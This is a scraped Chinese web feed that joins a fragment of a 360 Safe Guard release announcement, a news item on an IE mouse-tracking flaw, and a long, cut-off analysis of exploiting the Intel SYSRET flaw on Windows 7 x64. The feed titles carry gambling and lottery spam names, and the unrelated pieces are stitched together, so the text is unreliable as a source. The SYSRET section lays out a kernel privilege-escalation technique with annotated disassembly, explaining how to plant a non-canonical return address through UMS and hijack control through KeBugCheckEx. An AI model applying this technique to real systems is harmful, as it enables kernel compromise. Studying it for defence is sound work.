/>新版界面进行了全面统一,希望能带给大家更多惊喜——设计更精美,功能更强大,体验更平滑、流畅。在此感谢大家,卫士进步离不开大家热心帮助和支持!</p><p>{insd m=&quot;0&quot; i=&quot;3188&quot;}</p><p><strong>亮点一 全新动感安装界面</strong></p><p>全新的安装界面,清新自然,简洁直观,整个安装过程都是动态的,让你在静与动之间,感受卫士带来的全心保护!</p><p align="center"><img alt="" src="https://pic.cr173.com/up/2012-12/2012122709201961028.jpg" /></p><p><strong>亮点二 一键电脑加速</strong></p><p>“流量悬浮窗”华丽变身——成为“电脑加速”!</p><p>“电脑加速”拥有简洁生动的界面,可以根据电脑使用情况进行智能分析,为你关闭不重要且耗费资源的程序。“一键提速”,只需轻轻一点,就能让你的电脑卸掉重担,运转如飞!</p><p align="center"><img alt="" src="https://pic.cr173.com/up/2012-12/2012122709202051657.jpg" /></p><p><strong>亮点三 电脑门诊2.0</strong></p><p>“电脑门诊”进行了重大创新!我们开创性地推出搜索式界面,一搜解决电脑疑难杂症。门诊问题会分类展现,查找问题更加方便、高效。全面的修复方案为大家提供一站式电脑修复服务!不仅如此,你还可点击提交问题,让亿万360用户帮您解答电脑疑难杂症!</p><p align="center"><img alt="" src="https://pic.cr173.com/up/2012-12/2012122709202062610.jpg" /></p><p></p><p><strong>亮点四 全新电脑防护</strong></p><p>全新的安全防护弹窗,标题更加精简,主题更加突出明确。新版本还对按钮归精简,并采取了全新的简约式设计,让弹窗也变得气质十足!</p><p>更重要的是,“电脑防护”规则也进行了全面重造,所有内容更加体系化,使你的电脑防护无死角。<br /></p><p align="center"><img alt="" src="https://pic.cr173.com/up/2012-12/2012122709202062346.jpg" /></p><p></p><p><strong>亮点五 健康绿皮肤 质感提升</strong></p><p>我们采纳了之前广大“卫星”最广泛的意见,将卫士界面统一设置为健康绿,质感全面提升,风格清新、大方、灵动,让你在享有安全防护的同时也拥有一份绿色好心情!</p><p align="center"><img alt="" src="https://pic.cr173.com/up/2012-12/2012122709202292762.jpg" /></p> [病毒漏洞]IE浏览器新漏洞能够追踪鼠标移动、IE 6.0以上所有版本无一幸免-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/18587_1.html 西西 病毒漏洞 2012/12/13 9:44:37 <p>微软尽管一直试图提高Internet Explorer的公众形象--不过它依然还有很长的一段路要走。<strong>今天根据连线的报道,恶意网站能够通过这个新的安全漏洞屏幕上跟踪你的鼠标移动,</strong>而目前所有IE浏览器6.0以上所有版本都会受到影响。如果不信的话可以通过微软的浏览器访问这个无害的网站,或者你可以通过下面这段视频进一步了解:</p><p align="center"><embed height="400" type="application/x-shockwave-flash" align="middle" width="480" src="http://player.youku.com/player.php/sid/XNDg3NjIxMzA4/v.swf" allowscriptaccess="always" quality="high" allowfullscreen="true" /></p><p>该漏洞由于网页分析公司Spider.io发现,同时早在今年10月份的时候就报告给微软。但是微软的反应并不是十分的迅速,根据连线的报道称“微软的安全研究中心已经收到了这方面的报告,但是之间还没有敲定何时推出相关的补丁程序。”</p> [系统安全]Intel Sysret 漏洞在WIN7 X64下的实现分析-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/18440_1.html wowocock 系统安全 2012/12/4 11:57:32 <p>intel&nbsp;&nbsp;sysret 漏洞在WIN7 X64下的实现分析。<span style="color:#6600cc;">前半部分是网上现有的文章分析,后半部分为代码实现分析</span></p><p><strong>1. 漏洞浅析<br /></strong>在x64系统上,最重要的48位虚拟地址将被用于地址转换,而此外48到63的任何虚拟地址必须是47位的副本。否则处理器会抛出异常:保护故障(GP)。<br /><br />这会将虚拟地址分割位两个区块,如:<br />·&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;规范的高阶半区: 0xFFFFFF`FFFFFFFF&nbsp; &nbsp;&nbsp; &nbsp; 0xFFFF8000`00000000</p><p>·&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;规范的低阶半区: 0x00007FFF`FFFFFFFF&nbsp; &nbsp;0x00000000`00000000</p><p><br />而所有这之间的地址都会被认为是不规范的。<br /><br />SYSRET指令被用于传递返回到普通用户模式(user-mode)。它将RCX寄存器中的值复制到RIP寄存器中,并把Code Segment Selector位切换位普通用户模式(user-mode)。然而,RCX寄存器是一个通用寄存器,它可能包含的任何值,包括不规范的地址。并且SYSRET指令一旦抛出异常是不负责退栈切换回用户空间的,也不负责为GS寄存器做扫尾工作。这意味着,程序员在调用SYSRET指令前后都需要为GS,RSP,RBP做额外的处理。<br /><br />而我们恰好发现intel的SYSRET指令实现中存在一个缺陷: 如果一个不规范的地址从RCX寄存器传递而抛出GP, 那么在CG,RBP和RSP返回普通用户模式(user-mode)前, 其ring0的权限不会被取缔(因为没有任何扫尾工作)。<br /><br /><strong>2. MS windows中的漏洞触发<br /></strong><br />利用这个漏洞的关键是要抛出一个不规范的返回地址,而为了在MS Windows中触发这个漏洞,我们可以有以下的方式:<br /><br />·&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;映射内存并在0x7FFF`FFFFFFFF位执行一个系统调用。这将返回一个不规范的地址。然而,由于Windows地址空间的限制,这个地址是不可达的,因此此路不通罗马。</p><p>·&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;寻找一个系统调用,并能手动改变返回地址。</p><p><br />关于后者,可借力于UMS(User-Mode Scheduling 用户模式计划程序)。<br />&nbsp;&nbsp;ps: MSDN,UMS是一个轻量级的机制,应用程序可以用它来安排自己的线程。应用程序可以在用户模式下自由进行UMS线程间的切换而不必不涉及系统调度。<br /><br />为了使用UMS线程,可以用CreateUmsCompletionList()函数创建一个的UMS调度列表。scheduler线程将被链接到此调度列表,而scheduler线程也将需要被创建(scheduler线程通过EnterUmsSchedulingMode()从普通线程晋升为UMS线程)。<br /><br />如果UMS线程启动或阻塞,那么ExecuteUmsThread()函数需要被调用。如果没有, scheduler需要确定哪些线程将随后运行。它将排列调度列表,选择正确的线程。<br /><br />EnterUmsSchedulingMode()函数是ntdll.dll中实现的。从汇编代码中,我们可以看到,它得到当前的UMS线程,完成链接调度列表,保存线程上下文(寄存器),然后调用RtlpUmsPrimaryContextWrap()函数。</p><p>1.&nbsp; &nbsp; .text:0000000078F33A20 RtlEnterUmsSchedulingMode</p><p>2.&nbsp; &nbsp; .text:0000000078F33A20</p><p>3.&nbsp; &nbsp; .text:0000000078F33A20 arg_0 = qword ptr 8</p><p>4.&nbsp; &nbsp; .text:0000000078F33A20 arg_8 = qword ptr 10h</p><p>5.&nbsp; &nbsp; .text:0000000078F33A20 arg_10 = qword ptr 18h</p><p>6.&nbsp; &nbsp; .text:0000000078F33A20</p><p>7.&nbsp; &nbsp; .text:0000000078F33A20 mov [rsp+arg_8], rbx</p><p>8.&nbsp; &nbsp; .text:0000000078F33A25 mov [rsp+arg_10], rsi</p><p>9.&nbsp; &nbsp; .text:0000000078F33A2A push rdi</p><p>10.&nbsp;&nbsp;.text:0000000078F33A2B sub rsp, 20h</p><p>11.&nbsp;&nbsp;.text:0000000078F33A2F mov rsi, [rcx+8]</p><p>12.&nbsp;&nbsp;.text:0000000078F33A33 mov rbx, [rcx+10h]</p><p>13.&nbsp; &nbsp; [...]</p><p>14.&nbsp;&nbsp;.text:0000000078F33A5D loc_78F33A5D:</p><p>15.&nbsp;&nbsp;.text:0000000078F33A5D mov rdx, rsi</p><p>16.&nbsp;&nbsp;.text:0000000078F33A60 xor ecx, ecx</p><p>17.&nbsp;&nbsp;.text:0000000078F33A62 call RtlpAttachThreadToUmsCompletionList</p><p>18.&nbsp;&nbsp;.text:0000000078F33A67 test eax, eax</p><p>19.&nbsp;&nbsp;.text:0000000078F33A69 js short loc_78F33AA0</p><p>20.&nbsp;&nbsp;.text:0000000078F33A6B lea rcx, [rsp+28h+arg_0]</p><p>21.&nbsp;&nbsp;.text:0000000078F33A70 call RtlGetCurrentUmsThread</p><p>22.&nbsp;&nbsp;.text:0000000078F33A75 test eax, eax</p><p>23.&nbsp;&nbsp;.text:0000000078F33A77 js short loc_78F33A94</p><p>24.&nbsp;&nbsp;.text:0000000078F33A79 mov rcx, [rsp+28h+arg_0]</p><p>25.&nbsp;&nbsp;.text:0000000078F33A7E call RtlpSaveUmsdebugRegisterState</p><p>26.&nbsp;&nbsp;.text:0000000078F33A83 test eax, eax</p><p>27.&nbsp;&nbsp;.text:0000000078F33A85 js short loc_78F33A94</p><p>28.&nbsp;&nbsp;.text:0000000078F33A87 mov rdx, rdi</p><p>29.&nbsp;&nbsp;.text:0000000078F33A8A mov rcx, rbx</p><p>30.&nbsp;&nbsp;.text:0000000078F33A8D call RtlpUmsPrimaryContextWrap</p><p>31.&nbsp;&nbsp;.text:0000000078F33A92 jmp short $+2</p><p>RtlpUmsPrimaryContextWrap()函数负责调用scheduler并保存线程信息在一个结构中(ps:这是一个非文档化的结构),通过反汇编我们可以知道此结构为:<br />&nbsp;&nbsp;RSP<br />&nbsp;&nbsp;RBP<br />&nbsp;&nbsp;返回地址</p><p>1.&nbsp; &nbsp; .text:0000000078EA03F0 RtlpUmsPrimaryContextWrap</p><p>2.&nbsp; &nbsp; .text:0000000078EA03F0</p><p>3.&nbsp; &nbsp; .text:0000000078EA03F0 var_108 = xmmword ptr -108h</p><p>4.&nbsp; &nbsp; .text:0000000078EA03F0 var_F8 = xmmword ptr -0F8h</p><p>5.&nbsp; &nbsp; .text:0000000078EA03F0 var_E8 = xmmword ptr -0E8h</p><p>6.&nbsp; &nbsp; .text:0000000078EA03F0 var_D8 = xmmword ptr -0D8h</p><p>7.&nbsp; &nbsp; .text:0000000078EA03F0 var_C8 = xmmword ptr -0C8h</p><p>8.&nbsp; &nbsp; .text:0000000078EA03F0 var_38 = byte ptr -38h</p><p>9.&nbsp; &nbsp;&nbsp; &nbsp;[...]</p><p>10.&nbsp;&nbsp;.text:0000000078EA0452 mov [rax+30h], r15</p><p>11.&nbsp;&nbsp;.text:0000000078EA0456 mov r10, gs:14A0h</p><p>12.&nbsp;&nbsp;.text:0000000078EA045F lea r10, [r10+10h]</p><p>13.&nbsp;&nbsp;.text:0000000078EA0463 lea r11, loc_78EA0493</p><p>14.&nbsp;&nbsp;.text:0000000078EA046A mov [r10+0D0h], rcx&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; //这里将被HOOK </p><p>15.&nbsp;&nbsp;.text:0000000078EA0471 mov [r10+0A0h], rbp</p><p>16.&nbsp;&nbsp;.text:0000000078EA0478 mov [r10+98h], rsp</p><p>17.&nbsp;&nbsp;.text:0000000078EA047F mov [r10+0F8h], r11&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;// saved return</p><p>18.&nbsp;&nbsp;.text:0000000078EA0486 mov r12, 0</p><p>19.&nbsp;&nbsp;.text:0000000078EA048D xor r13, r13</p><p>20.&nbsp;&nbsp;.text:0000000078EA0490 mov r14, rdx</p><p>21.&nbsp;&nbsp;.text:0000000078EA0493</p><p>22.&nbsp;&nbsp;.text:0000000078EA0493 loc_78EA0493:</p><p>23.&nbsp;&nbsp;.text:0000000078EA0493 mov r10, gs:14A0h</p><p>24.&nbsp;&nbsp;.text:0000000078EA049C lea r10, [r10+10h]</p><p>25.&nbsp;&nbsp;.text:0000000078EA04A0 mov r11, [r10+0D0h]&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;// scheduler func</p><p>26.&nbsp;&nbsp;.text:0000000078EA04A7 mov rcx, r12</p><p>27.&nbsp;&nbsp;.text:0000000078EA04AA mov rdx, r13</p><p>28.&nbsp;&nbsp;.text:0000000078EA04AD mov r8, r14</p><p>29.&nbsp;&nbsp;.text:0000000078EA04B0 call r11&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;// calls the scheduler function</p><p>30.&nbsp;&nbsp;.text:0000000078EA04B3 lea rcx, [rsp+138h+var_38]</p><p>31.&nbsp;&nbsp;.text:0000000078EA04BB movaps xmm6, [rsp+138h+var_108]</p><p>32.&nbsp;&nbsp;.text:0000000078EA04C0 movaps xmm7, [rsp+138h+var_F8]</p><p><strong>如果我们调试内核</strong>,在Ntoskrnl.exe的KeBuildPrimaryThreadContext()函数处设置bp,我们可以看到0x00000000`78EA0493被保存为返回到用户空间的地址。</p><p>1.&nbsp; &nbsp; PAGE:FFFFF80002C5A070 KeBuildPrimaryThreadContext</p><p>2.&nbsp; &nbsp; PAGE:FFFFF80002C5A070</p><p>3.&nbsp; &nbsp; PAGE:FFFFF80002C5A070 arg_0 = qword ptr 8</p><p>4.&nbsp; &nbsp; PAGE:FFFFF80002C5A070 arg_20 = qword ptr 28h</p><p>5.&nbsp; &nbsp; PAGE:FFFFF80002C5A070 arg_28 = qword ptr 30h</p><p>6.&nbsp; &nbsp; PAGE:FFFFF80002C5A070</p><p>7.&nbsp; &nbsp; PAGE:FFFFF80002C5A070 mov [rsp+arg_0], rbx</p><p>8.&nbsp; &nbsp; PAGE:FFFFF80002C5A075 movsxd rbx, r9d</p><p>9.&nbsp; &nbsp; PAGE:FFFFF80002C5A078 mov r9, rdx</p><p>10.&nbsp;&nbsp;PAGE:FFFFF80002C5A07B xor r10d, r10d</p><p>11.&nbsp;&nbsp;PAGE:FFFFF80002C5A07E mov rax, [rcx+1B8h]</p><p>12.&nbsp;&nbsp;PAGE:FFFFF80002C5A085 mov r11, [rax]</p><p>13.&nbsp;&nbsp;PAGE:FFFFF80002C5A088 cmp r8, r10</p><p>14.&nbsp;&nbsp;PAGE:FFFFF80002C5A08B jz loc_FFFFF80002C5A168</p><p>15.&nbsp;&nbsp;[...]</p><p>16.&nbsp;&nbsp;PAGE:FFFFF80002C5A168 loc_FFFFF80002C5A168:</p><p>17.&nbsp;&nbsp;PAGE:FFFFF80002C5A168 mov rdx, [rdx+50h]</p><p>18.&nbsp;&nbsp;PAGE:FFFFF80002C5A16C mov rcx, [r9+58h]</p><p>19.&nbsp;&nbsp;PAGE:FFFFF80002C5A170 mov rax, [r11+108h]</p><p>20.&nbsp;&nbsp;PAGE:FFFFF80002C5A177 mov [rdx+168h], rax&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;// saved RIP</p><p>21.&nbsp;&nbsp;PAGE:FFFFF80002C5A17E mov rax, [r11+0A8h]</p><p>22.&nbsp;&nbsp;PAGE:FFFFF80002C5A185 mov [rdx+180h], rax</p><p>23.&nbsp;&nbsp;PAGE:FFFFF80002C5A18C mov rax, [r11+0B0h]</p><p>24.&nbsp;&nbsp;PAGE:FFFFF80002C5A193 mov [rdx+158h], rax</p><p>25.&nbsp;&nbsp;PAGE:FFFFF80002C5A19A mov eax, 33h ; '3'</p><p>26.&nbsp;&nbsp;PAGE:FFFFF80002C5A19F mov [rdx+170h], ax</p><p>27.&nbsp;&nbsp;PAGE:FFFFF80002C5A1A6 mov eax, 2Bh ; '+'</p><p>28.&nbsp;&nbsp;PAGE:FFFFF80002C5A1AB mov [rdx+188h], ax</p><p><strong>我们的想法是在ExecuteUmsThread()调用前破坏这个地址为非规范地址</strong>。而在用户态的scheduler中,返回地址保存在: GS:[0x14a0] + 0x10 + 0x1F处。<br /><br />内核调度结束后,ntoskrnl.exe中的KiUmsFastReturnToUser()函数被调用。在调用SYSRET指令前, RSP, RBP和GS将会被重置为他们之前保存的副本,返回用户态的地址也被移入RCX寄存器。</p><p>1.&nbsp; &nbsp; .text:FFFFF800028DD440 KiUmsFastReturnToUser</p><p>2.&nbsp; &nbsp; .text:FFFFF800028DD440</p><p>3.&nbsp; &nbsp; .text:FFFFF800028DD440 var_5046 = dword ptr -5046h</p><p>4.&nbsp; &nbsp; .text:FFFFF800028DD440 var_4FA6 = byte ptr -4FA6h</p><p>5.&nbsp; &nbsp; .text:FFFFF800028DD440 arg_42 = byte ptr 52h</p><p>6.&nbsp; &nbsp; .text:FFFFF800028DD440 arg_80 = byte ptr 88h</p><p>7.&nbsp; &nbsp; .text:FFFFF800028DD440 arg_190 = dword ptr 198h</p><p>8.&nbsp; &nbsp; .text:FFFFF800028DD440</p><p>9.&nbsp; &nbsp; .text:FFFFF800028DD440 sub rsp, 28h</p><p>10.&nbsp;&nbsp;.text:FFFFF800028DD444 mov rbx, gs:+188h</p><p>11.&nbsp;&nbsp;.text:FFFFF800028DD44D mov rcx, [rbx+1D8h]</p><p>12.&nbsp;&nbsp;.text:FFFFF800028DD454 lea rbp, [rcx+80h]</p><p>13.&nbsp;&nbsp;.text:FFFFF800028DD45B mov rax, cr8</p><p>14.&nbsp; &nbsp; [...]</p><p>15.&nbsp;&nbsp;.text:FFFFF800028DD596 loc_FFFFF800028DD596:</p><p>16.&nbsp;&nbsp;.text:FFFFF800028DD596 mov r8, [rbp+100h]&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;// saved RSP</p><p>17.&nbsp;&nbsp;.text:FFFFF800028DD59D mov r9, [rbp+0D8h]&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;// saved RBP</p><p>18.&nbsp;&nbsp;.text:FFFFF800028DD5A4 xor edx, edx</p><p>19.&nbsp;&nbsp;.text:FFFFF800028DD5A6 pxor xmm0, xmm0</p><p>20.&nbsp;&nbsp;.text:FFFFF800028DD5AA pxor xmm1, xmm1</p><p>21.&nbsp;&nbsp;.text:FFFFF800028DD5AE pxor xmm2, xmm2</p><p>22.&nbsp;&nbsp;.text:FFFFF800028DD5B2 pxor xmm3, xmm3</p><p>23.&nbsp;&nbsp;.text:FFFFF800028DD5B6 pxor xmm4, xmm4</p><p>24.&nbsp;&nbsp;.text:FFFFF800028DD5BA pxor xmm5, xmm5</p><p>25.&nbsp;&nbsp;.text:FFFFF800028DD5BE mov rcx, [rbp+0E8h]&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;// saved ret address</p><p>26.&nbsp;&nbsp;.text:FFFFF800028DD5C5 mov r11, [rbp+0F8h]</p><p>27.&nbsp;&nbsp;.text:FFFFF800028DD5CC mov rbp, r9</p><p>28.&nbsp;&nbsp;.text:FFFFF800028DD5CF mov rsp, r8</p><p>29.&nbsp;&nbsp;.text:FFFFF800028DD5D2 swapgs&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;// switch GS to user</p><p>30.&nbsp;&nbsp;.text:FFFFF800028DD5D5 sysret</p><p>31.&nbsp;&nbsp;.text:FFFFF800028DD5D8 db 66h, 66h, 66h, 66h, 66h, 66h</p><p>32.&nbsp;&nbsp;.text:FFFFF800028DD5D8 nop word ptr [rax+rax+00000000h]</p><p>33.&nbsp;&nbsp;.text:FFFFF800028DD5E7 db 66h, 66h, 66h, 66h, 66h, 66h</p><p>但是,如果此时RCX是不规范的,那么GP异常将在特权模式下被抛出。<br /><br /><strong>3. Windows 7 &amp; Windows 2008 R2 x64下的利用<br /></strong><br />GP异常抛出时,RSP和RBP可控,GS指向用户态,PFH(protection fault handler)则被指向KiGeneralProtectionFault()函数<br /><br />一种利用此漏洞的方式,是利用已控的RBP和RBP。因为KiGeneralProtectionFault()将会把值写入堆栈,且堆栈也是可控的。基于这些我们可以试试write-4 techniques。<br /><br />ps: write-4 techniques - http://immunityinc.com/infiltrate/archives/kernelpool_infiltrate2011.pdf</p><p>1.&nbsp; &nbsp; .text:FFFFF800028DBAC0 KiGeneralProtectionFault</p><p>2.&nbsp; &nbsp; .text:FFFFF800028DBAC0</p><p>3.&nbsp; &nbsp; .text:FFFFF800028DBAC0 var_12D = byte ptr -12Dh</p><p>4.&nbsp; &nbsp; .text:FFFFF800028DBAC0 var_12C = dword ptr -12Ch</p><p>5.&nbsp; &nbsp; .text:FFFFF800028DBAC0 var_128 = qword ptr -128h</p><p>6.&nbsp; &nbsp; .text:FFFFF800028DBAC0 var_120 = qword ptr -120h</p><p>7.&nbsp; &nbsp; .text:FFFFF800028DBAC0 var_118 = qword ptr -118h</p><p>8.&nbsp; &nbsp; .text:FFFFF800028DBAC0 var_110 = qword ptr -110h</p><p>9.&nbsp; &nbsp; .text:FFFFF800028DBAC0 var_108 = qword ptr -108h</p><p>10.&nbsp;&nbsp;.text:FFFFF800028DBAC0 var_100 = qword ptr -100h</p><p>11.&nbsp;&nbsp;.text:FFFFF800028DBAC0 var_F8 = qword ptr -0F8h</p><p>12.&nbsp;&nbsp;.text:FFFFF800028DBAC0 var_E8 = xmmword ptr -0E8h</p><p>13.&nbsp;&nbsp;.text:FFFFF800028DBAC0 var_D8 = xmmword ptr -0D8h</p><p>14.&nbsp;&nbsp;.text:FFFFF800028DBAC0 var_C8 = xmmword ptr -0C8h</p><p>15.&nbsp;&nbsp;.text:FFFFF800028DBAC0 var_B8 = xmmword ptr -0B8h</p><p>16.&nbsp;&nbsp;.text:FFFFF800028DBAC0 var_A8 = xmmword ptr -0A8h</p><p>17.&nbsp;&nbsp;.text:FFFFF800028DBAC0 var_98 = xmmword ptr -98h</p><p>18.&nbsp;&nbsp;.text:FFFFF800028DBAC0 var_58 = word ptr -58h</p><p>19.&nbsp;&nbsp;.text:FFFFF800028DBAC0 arg_0 = qword ptr 10h</p><p>20.&nbsp;&nbsp;.text:FFFFF800028DBAC0 arg_8 = byte ptr 18h</p><p>21.&nbsp;&nbsp;.text:FFFFF800028DBAC0 arg_10 = qword ptr 20h</p><p>22.&nbsp;&nbsp;.text:FFFFF800028DBAC0 arg_24 = dword ptr 34h</p><p>23.&nbsp;&nbsp;.text:FFFFF800028DBAC0</p><p>24.&nbsp;&nbsp;.text:FFFFF800028DB600 push rbp</p><p>25.&nbsp;&nbsp;.text:FFFFF800028DB601 sub rsp, 158h</p><p>26.&nbsp;&nbsp;.text:FFFFF800028DB608 lea rbp, [rsp+80h]</p><p>27.&nbsp;&nbsp;.text:FFFFF800028DB610 mov [rbp+0D8h+var_12D], 1</p><p>28.&nbsp;&nbsp;.text:FFFFF800028DB614 mov [rbp+0D8h+var_128], rax</p><p>29.&nbsp;&nbsp;.text:FFFFF800028DB618 mov [rbp+0D8h+var_120], rcx</p><p>30.&nbsp;&nbsp;.text:FFFFF800028DB61C mov [rbp+0D8h+var_118], rdx</p><p>31.&nbsp;&nbsp;.text:FFFFF800028DB620 mov [rbp+0D8h+var_110], r8</p><p>32.&nbsp;&nbsp;.text:FFFFF800028DB624 mov [rbp+0D8h+var_108], r9</p><p>33.&nbsp;&nbsp;.text:FFFFF800028DB628 mov [rbp+0D8h+var_100], r10</p><p>34.&nbsp;&nbsp;.text:FFFFF800028DB62C mov [rbp+0D8h+var_F8], r11</p><p>35.&nbsp;&nbsp;.text:FFFFF800028DB630 test [rbp+0D8h+arg_8], 1</p><p>36.&nbsp;&nbsp;.text:FFFFF800028DB637 jz short loc_FFFFF800028DB65A</p><p>37.&nbsp;&nbsp;.text:FFFFF800028DB639 swapgs</p><p>38.&nbsp;&nbsp;.text:FFFFF800028DB63C mov r10, gs:188h</p><p>39.&nbsp;&nbsp;.text:FFFFF800028DB645 test byte ptr [r10+3], 3</p><p>40.&nbsp;&nbsp;.text:FFFFF800028DB64A mov [rbp+0D8h+var_58], 0</p><p>然而,因为目标内存周围数据已被破坏,这使得此exp方法不可靠。<br /><br /><strong>一个更好的方法是利用指向用户空间的GS。</strong>我们的思路是,欺骗内核调用GS中索引的函数。这种功能可以触发页错误处理程序(所有这一切需要做的是产生此异常)。</p><p>1.&nbsp; &nbsp; .text:FFFFF800028DB65A cld</p><p>2.&nbsp; &nbsp; .text:FFFFF800028DB65B stmxcsr [rbp+0D8h+var_12C]</p><p>3.&nbsp; &nbsp; .text:FFFFF800028DB65F ldmxcsr dword ptr gs:180h</p><p>4.&nbsp; &nbsp; .text:FFFFF800028DB668 movaps [rbp+0D8h+var_E8], xmm0</p><p>5.&nbsp; &nbsp; .text:FFFFF800028DB66C movaps [rbp+0D8h+var_D8], xmm1</p><p>6.&nbsp; &nbsp; .text:FFFFF800028DB670 movaps [rbp+0D8h+var_C8], xmm2</p><p>7.&nbsp; &nbsp; .text:FFFFF800028DB674 movaps [rbp+0D8h+var_B8], xmm3</p><p>8.&nbsp; &nbsp; .text:FFFFF800028DB678 movaps [rbp+0D8h+var_A8], xmm4</p><p>9.&nbsp; &nbsp; .text:FFFFF800028DB67C movaps [rbp+0D8h+var_98], xmm5</p><p>10.&nbsp;&nbsp;.text:FFFFF800028DB680 mov eax, [rbp+0E0h]</p><p>11.&nbsp;&nbsp;.text:FFFFF800028DB686 test [rbp+0D8h+arg_10], 200h</p><p>12.&nbsp;&nbsp;.text:FFFFF800028DB691 jz short loc_FFFFF800028DB694</p><p>13.&nbsp;&nbsp;.text:FFFFF800028DB693 sti</p><p>14.&nbsp;&nbsp;.text:FFFFF800028DB694 loc_FFFFF800028DB694:</p><p>15.&nbsp;&nbsp;.text:FFFFF800028DB694 mov r10, [rbp+0D8h+arg_0]</p><p>16.&nbsp;&nbsp;.text:FFFFF800028DB69B mov r9, cr4</p><p>17.&nbsp;&nbsp;.text:FFFFF800028DB69F mov r8, cr0</p><p>18.&nbsp;&nbsp;.text:FFFFF800028DB6A3 mov edx, 8</p><p>19.&nbsp;&nbsp;.text:FFFFF800028DB6A8 mov ecx, 7Fh</p><p>20.&nbsp;&nbsp;.text:FFFFF800028DB6AD call KiBugCheckDisPatch</p><p><strong>此函数叫做 KeBugCheckEx()</strong></p><p>1.&nbsp; &nbsp; .text:FFFFF800028DD180 KiBugCheckDispatch</p><p>2.&nbsp; &nbsp; .text:FFFFF800028DD180</p><p>3.&nbsp; &nbsp; .text:FFFFF800028DD180 var_118= qword ptr -118h</p><p>4.&nbsp; &nbsp; .text:FFFFF800028DD180 var_108= xmmword ptr -108h</p><p>5.&nbsp; &nbsp; .text:FFFFF800028DD180 var_F8= xmmword ptr -0F8h</p><p>6.&nbsp; &nbsp; .text:FFFFF800028DD180 var_E8= xmmword ptr -0E8h</p><p>7.&nbsp; &nbsp; .text:FFFFF800028DD180 var_D8= xmmword ptr -0D8h</p><p>8.&nbsp; &nbsp; .text:FFFFF800028DD180 var_C8= xmmword ptr -0C8h</p><p>9.&nbsp; &nbsp; .text:FFFFF800028DD180 var_38= byte ptr -38h</p><p>10.&nbsp;&nbsp;.text:FFFFF800028DD180</p><p>11.&nbsp;&nbsp;.text:FFFFF800028DD180 sub rsp, 138h</p><p>12.&nbsp;&nbsp;.text:FFFFF800028DD187 lea rax, [rsp+138h+var_38]</p><p>13.&nbsp;&nbsp;.text:FFFFF800028DD18F movaps [rsp+138h+var_108], xmm6</p><p>14.&nbsp;&nbsp;.text:FFFFF800028DD194 movaps [rsp+138h+var_F8], xmm7</p><p>15.&nbsp;&nbsp;.text:FFFFF800028DD199 movaps [rsp+138h+var_E8], xmm8</p><p>16.&nbsp; &nbsp; [...]</p><p>17.&nbsp;&nbsp;.text:FFFFF800028DD1D3 mov [rax+20h], r13</p><p>18.&nbsp;&nbsp;.text:FFFFF800028DD1D7 mov [rax+28h], r14</p><p>19.&nbsp;&nbsp;.text:FFFFF800028DD1DB mov [rax+30h], r15</p><p>20.&nbsp;&nbsp;.text:FFFFF800028DD1DF mov [rsp+138h+var_118], r10</p><p>21.&nbsp;&nbsp;.text:FFFFF800028DD1E4 call KeBugCheckEx</p><p>22.&nbsp;&nbsp;.text:FFFFF800028DD1E4 KiBugCheckDispatch endp</p><p>KeBugCheckEx()函数需要将控制状态寄存器保存到GS索引的一个内存结构。</p><p>1.&nbsp; &nbsp; .text:FFFFF800028DDC40 KeBugCheckEx</p><p>2.&nbsp; &nbsp; .text:FFFFF800028DDC40</p><p>3.&nbsp; &nbsp; .text:FFFFF800028DDC40 var_18= qword ptr -18h</p><p>4.&nbsp; &nbsp; .text:FFFFF800028DDC40 var_10= qword ptr -10h</p><p>5.&nbsp; &nbsp; .text:FFFFF800028DDC40 var_8= qword ptr -8</p><p>6.&nbsp; &nbsp; .text:FFFFF800028DDC40 arg_0= qword ptr 8</p><p>7.&nbsp; &nbsp; .text:FFFFF800028DDC40 arg_8= qword ptr 10h</p><p>8.&nbsp; &nbsp; .text:FFFFF800028DDC40 arg_10= qword ptr 18h</p><p>9.&nbsp; &nbsp; .text:FFFFF800028DDC40 arg_18= qword ptr 20h</p><p>10.&nbsp;&nbsp;.text:FFFFF800028DDC40 arg_20= qword ptr 28h</p><p>11.&nbsp;&nbsp;.text:FFFFF800028DDC40 arg_28= byte ptr 30h</p><p>12.&nbsp;&nbsp;.text:FFFFF800028DDC40</p><p>13.&nbsp;&nbsp;.text:FFFFF800028DDC40 mov [rsp+arg_0], rcx</p><p>14.&nbsp;&nbsp;.text:FFFFF800028DDC45 mov [rsp+arg_8], rdx</p><p>15.&nbsp;&nbsp;.text:FFFFF800028DDC4A mov [rsp+arg_10], r8</p><p>16.&nbsp;&nbsp;.text:FFFFF800028DDC4F mov [rsp+arg_18], r9</p><p>17.&nbsp;&nbsp;.text:FFFFF800028DDC54 pushfq</p><p>18.&nbsp;&nbsp;.text:FFFFF800028DDC55 sub rsp, 30h</p><p>19.&nbsp;&nbsp;.text:FFFFF800028DDC59 